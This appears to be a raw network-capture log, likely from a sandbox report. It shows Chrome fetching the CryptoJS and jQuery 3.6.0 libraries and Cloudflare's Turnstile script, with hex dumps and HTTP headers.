                                                                                                                          2024-11-25 15:42:31 UTC406INData Raw: 37 62 65 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                          Data Ascii: 7bee!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                                                                                          Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                                                                                          Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                                                                                          Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                                                                                                          Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                                                                                                          Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                                                                                          Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                                                                          Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                                                                          Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                                                                          2024-11-25 15:42:31 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                                                                                          Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449750151.101.2.1374434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:30 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                          Host: code.jquery.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:31 UTC611INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 89501
                                                                                                                          Server: nginx
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:30 GMT
                                                                                                                          Age: 2531426
                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890034-NYC
                                                                                                                          X-Cache: HIT, HIT
                                                                                                                          X-Cache-Hits: 55, 1
                                                                                                                          X-Timer: S1732549351.978484,VS0,VE1
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          2024-11-25 15:42:31 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                          2024-11-25 15:42:31 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                          2024-11-25 15:42:31 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                          2024-11-25 15:42:31 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                          2024-11-25 15:42:31 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                          2024-11-25 15:42:31 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449751104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:32 UTC383OUTGET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:32 UTC471INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:32 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 47695
                                                                                                                          Connection: close
                                                                                                                          accept-ranges: bytes
                                                                                                                          last-modified: Tue, 19 Nov 2024 14:16:20 GMT
                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                          access-control-allow-origin: *
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfce698c8c0f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
